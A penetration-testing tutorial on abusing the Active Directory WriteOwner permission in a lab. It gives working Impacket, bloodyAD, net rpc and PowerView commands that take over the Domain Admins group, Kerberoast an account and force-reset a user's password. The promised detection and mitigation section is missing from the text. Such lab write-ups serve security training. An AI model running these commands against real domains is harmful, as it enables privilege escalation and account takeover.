In this post, we delve into WriteOwner Active Directory abuse, a powerful technique that allows attackers to change the ownership of directory objects. Specifically, by abusing the WriteOwner permission in Discretionary Access Control Lists (DACLs), adversaries can take over sensitive objects and escalate privileges within the domain.

To begin, we outline the lab setup necessary to simulate these attacks and map methods to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Additionally, we cover detection mechanisms for identifying suspicious activities linked to WriteOwner attacks, alongside actionable recommendations for mitigating these vulnerabilities. Overall, this overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

Abusing AD-DACL- WriteOwner

WriteOwner Permission

Prerequisites

Lab Setup – User Owns WriteOwner Permission on the Domain Admin Group

Exploitation Phase I – User Owns WriteOwner Permission on a Group

Bloodhound – Hunting for Weak Permission

Method for Exploitation – Granting Ownership & Full Control Followed by Account Manipulation (T1098)

1. Linux Impacket tool – Granting Ownership & Full Control
   • Linux – Adding Member to the Group

Linux Net RPC – Samba

Linux Bloody AD

2. Windows PowerShell Powerview – Granting Ownership & Full Control
   • Windows Net command – Adding Member to the Group

Lab Setup – User Owns WriteOwner Permission on Another User

Exploitation Phase II – User Owns WriteOwner Permission on Another User

Bloodhound – Hunting for Weak Permission

Method for Exploitation – Granting Ownership & Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1110.001)

1. Linux Impacket tool – Granting Ownership & Full Control
   • Linux Python Script – TargetedKerberoast
   • Linux – Change Password

Linux Net RPC – Samba

Linux Bloody AD

2. Windows PowerShell Powerview – Granting Ownership & Full Control
   • Windows PowerShell Powerview – Kerberoasting
   • Windows PowerShell Powerview – Change Password

Detection & Mitigation

WriteOwner Permission

The WriteOwner permission allows a user to change the ownership of an object to a different user or principal, including one controlled by an attacker. Consequently, an attacker can exploit this permission to take ownership of a target object.

Once the attacker successfully assumes ownership, they can fully manipulate the object. This includes modifying permissions to grant themselves or others Full Control over the object. For example, the attacker could assign Full Control permissions, allowing unrestricted access to read, write, or delete the object.

• Specifically, WriteOwner permissions on a group allow attackers to grant the right to add members to that group.
• When applied to a user object, this permission enables attackers to gain full control over the account.
• In the case of computer objects, it allows the attacker to obtain unrestricted access and control.
• Finally, possessing WriteOwner permissions on a domain object enables the attacker to perform a DCSync operation, simulating a Domain Controller to extract sensitive credentials.

Prerequisites

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Bloodhound, Net RPC, Powerview, BloodyAD, Impacket
• Windows 10/11 – As Client

Lab Setup – User Owns WriteOwner Permission on the Domain Admin Group

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

• Install Windows Server (2016 or 2019 recommended).
• Promote it to a Domain Controller by adding the Active Directory Domain Services
• Set up the domain (e.g., local).

User Accounts:

• Create a standard user account named Aaru.

net user aaru Password@1 /add /domain

Assign the “WriteOwner” Privilege to Aaru:

Once your AD environment is set up, you need to assign the “WriteOwner” privilege to Aaru over the Domain Admins group.

Steps:

• Open Active Directory Users and Computers (ADUC) on the Domain Controller.
• Enable the Advanced Features view by clicking on View > Advanced Features.
• Locate the Domain Admins group in the Users container.
• Right-click on Domain Admins and go to Properties.

• Go to the Security tab, and click on Add button

• In the “Enter the object name to select” box, type Aaru and click Check Names and click on OK.

• Select Aaru user and in the Permissions section, and click on Advanced option

• In the Advanced security settings box, double-click on Aaru user’s permission entry.
• In the Permissionssection, check the box for Modify Owner
• Apply the settings.

At this point, Aaru now has WriteOwner rights over the Domain Admins group, meaning they can add themselves to the group.

Exploitation Phase II – User Owns WriteOwner Permission on a Group

Bloodhound – Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Aaru has the WriteOwner permission on the Domain Admins group.

bloodhound-python -u aaru -p Password@1 -ns 192.168.1.6 -d ignite.local -c All

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

Thus, it has shown the Aaru User has WriteOwner privilege over Domain Admins group.

Method for Exploitation – Granting Ownership & Full Control Followed by Account Manipulation (T1098)

Linux Impacket tool – Granting Ownership & Full Control

Granting Ownership:

From UNIX-like systems, this can be done with Impacket‘s owneredit.py (Python), alternatively Impacket-owneredit

impacket-owneredit -action write -new-owner 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.6

With the help of owneredit, the DACL for this object is successfully modified, aaru user now have Ownership over the group.

Granting Full Control:

Let’s grant the user ‘Aaru’ full control over the Domain Admins group using Impacket’s dacledit tool.

From UNIX-like systems, this can be done with Impacket‘s dacledit.py (Python), alternatively Impacket-dacledit.

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.6

With the help of dacledit, the DACL for this object is successfully modified, aaru user now have full Control over the group.

Linux – Adding Member to the Group

Linux Net RPC – Samba

The tester can abuse this permission by adding Aaru User into Domain Admin group and list the domain admin members to ensure that Aaru Users becomes Domain Admin.

net rpc group addmem "Domain Admins" aaru -U ignite.local/aaru%'Password@1' -S 192.168.1.6

Linux Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.6" -d "ignite.local" -u "aaru" -p "Password@1" add groupMember "Domain Admins" "aaru"

Windows PowerShell Powerview – Granting Ownerahip & Full Control

From a Windows system, this can be achieved with Set-DomainObjectOwner to grant ownership followed by Add-DomainObjectAcl (PowerView module) to grant full permission over the target.

powershell -ep bypass
Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'aaru'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Domain Admins" -PrincipalIdentity "aaru"

Windows Net command – Adding Member to the Group

This can be achieved with a native command line, using windows net command.

net group "domain admins" aaru /add /domain

thus, from user property we can see Aaru user has become the member of domain admin.

Lab Setup – User Owns WriteOwner Permission on Another User

In this lab setup, we will simulate a scenario where one user has WriteOwner permission over another user. Specifically, we will create two users: Ankur and Sakshi, where Sakshi is granted WriteOwner access_ over Ankur.

Create the AD Environment and User accounts

To begin, set up a Windows Server (2016 or 2019 recommended) as the Domain Controller (DC) and prepare a client machine (Windows or Linux) to run enumeration and exploitation tools.

Domain Controller:

• Install Windows Server (2016 or 2019 recommended).
• Promote it to a Domain Controller by adding the Active Directory Domain Services
• Set up the domain (e.g., ignite.local).

User Accounts:

• Next, create two AD user accounts named Ankur and Sakshi using the following commands:

net user ankur Password@1 /add /domain
net user sakshi Password@1 /add /domain

Assign the “WriteOwner” Privilege:

After creating the users, proceed to assign WriteOwner permission to Sakshi over the Ankur user account.

1. Open Active Directory Users and Computers (ADUC) on the Domain Controller.
2. Enable the Advanced Features view by clicking on View > Advanced Features.
3. Locate User Ankur in the Users
4. Right-click on Ankur User and go to Properties.

Modify Permissions

      5. Navigate to the Security tab, and click on Add button

      6. In the “Enter the object name to select” box, type Sakshi and click Check Names, then click OK.

      7. Select the Sakshi user, and in the Permissions section, click on Advanced

      8.  In the Advanced security settings box, double-click on Sakshi user’s permission entry.

      9.  In the Permissions section, check on the box for Modify owner

      10. Click Apply to save the settings.

At this point, the Sakshi user now holds WriteOwner permission over the Ankur user object. As a result, Sakshi can take ownership and potentially escalate privileges or manipulate permissions on that object.

Exploitation Phase I – User Owns WriteOwner Permission on Another User

Bloodhound – Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Sakshi has the WriteOwner permission for Ankur user.

bloodhound-python -u sakshi -p Password@1 -ns 192.168.1.6 -d ignite.local -c All

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

From the graph it can be observed that the Sakshi user owns WriteOwner privilege on Ankur user.

Method for Exploitation – Granting Ownership & Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1110.001)

Attackers can exploit the WriteOwner permission when they gain control of an object that has this privilege over another directory object. This allows them to grant ownership, then assign full control, and ultimately perform attacks like Kerberoasting or a Password Change without knowing the victim’s current credentials.

Linux Impacket tool – Granting Ownership & Full Control

Granting Ownership:

To begin, use the Impacket‘s toolkit from a UNIX-like system. The tool owneredit.py allows changing ownership of a directory object.

impacket-owneredit -action write -new-owner 'sakshi' -target-dn 'CN=ankur,CN=Users,DC=ignite,DC=local' 'ignite.local'/'sakshi':'Password@1' -dc-ip 192.168.1.6

 With the help of owneredit, the DACL for the Ankur user object is successfully modified. As a result, the Sakshi user now owns the Ankur account.

Granting Full Control:

Next, use dacledit.py to assign Full Control to Sakshi over the Ankur user object.

From UNIX-like systems, this can be done with Impacket‘s dacledit.py (Python), alternatively Impacket-dacledit.

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'sakshi' -target-dn 'CN=ankur,CN=Users,DC=ignite,DC=local' 'ignite.local'/'sakshi':'Password@1' -dc-ip 192.168.1.6

With the help of dacledit, the DACL for this object is successfully modified, and Sakshi now has full control over the Ankur user.

Now, since the user has full control over the target then it can either perform kerberoasting or can change the password without knowing target’s current password (ForceChangePassword)

Linux Python Script – TargetedKerberoast

From UNIX-like systems, this can be done with targetedKerberoast.py (Python).

./targetedKerberoast.py --dc-ip '192.168.1.6' -v -d 'ignite.local' -u 'sakshi' -p 'Password@1'

Finally, once attackers dump hashes (e.g., from Kerberoasting), they can use tools like John the Ripper and common dictionaries such as RockYou.txt to brute-force weak passwords.

Linux – Change Password

Linux Net RPC – Samba

You can achieve this from a UNIX-like system with net, a tool for the administration of Samba and CIFS/SMB clients.

net rpc password ankur 'Password@987' -U ignite.local/sakshi%'Password@1' -S 192.168.1.6

 Linux Bloody AD

Alternatively, you can achieve this using bloodyAD

bloodyAD --host "192.168.1.6" -d "ignite.local" -u "sakshi" -p "Password@1" set password "ankur" "Password@987"

Windows PowerShell Powerview – Granting Ownership & Full Control

On Windows systems, attackers can leverage the PowerView module to grant both Ownership and Full Control over a target object. This process involves two core cmdlets: Set-DomainObjectOwner and Add-DomainObjectAcl.

powershell -ep bypass
Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity 'ankur' -OwnerIdentity 'sakshi'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ankur" -PrincipalIdentity "sakshi"

This assigns ownership of the Ankur user object to the Sakshi user.

 With the help of Set-DomainObjectOwner and Add-DomainObjectAcl, the DACL for the object is successfully updated. As a result, the Sakshi user gains full control over the Ankur account, including permissions to modify, reset, or delete it.

Now, since the user has full control over the target then it can either perform kerberoasting or can change the password without knowing target’s current password (ForceChangePassword)

Windows PowerShell Powerview – Kerberoasting

To proceed, attackers can use PowerView’s Set-DomainObject and Get-DomainSPNTicket to manipulate SPNs (Service Principal Names) and request service tickets for offline cracking.

Set-DomainObject -Identity 'ankur' -Set @{serviceprincipalname='nonexistent/hacking'}
Get-DomainUser 'ankur' | Select serviceprincipalname
$User = Get-DomainUser 'ankur'
$User | Get-DomainSPNTicket

Kerberoasting allows attackers to extract TGS tickets for SPN-enabled accounts and then brute-force them offline using hash cracking tools.

Windows PowerShell Powerview – Change Password

The attacker can change the password of the user using PowerView module. This can be achieved with Set-DomainUserPassword cmdlet.

Alternatively, if the attacker prefers account takeover, they can change the user’s password without knowing the current one.

$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force
Set-DomainUserPassword -Identity 'ankur' -AccountPassword $NewPassword

The Sakshi user resets Ankur’s password without any knowledge of the original, ensuring complete account compromise.

Author: Pradnya Pawar is an InfoSec researcher and Security Tech Lead. Contact here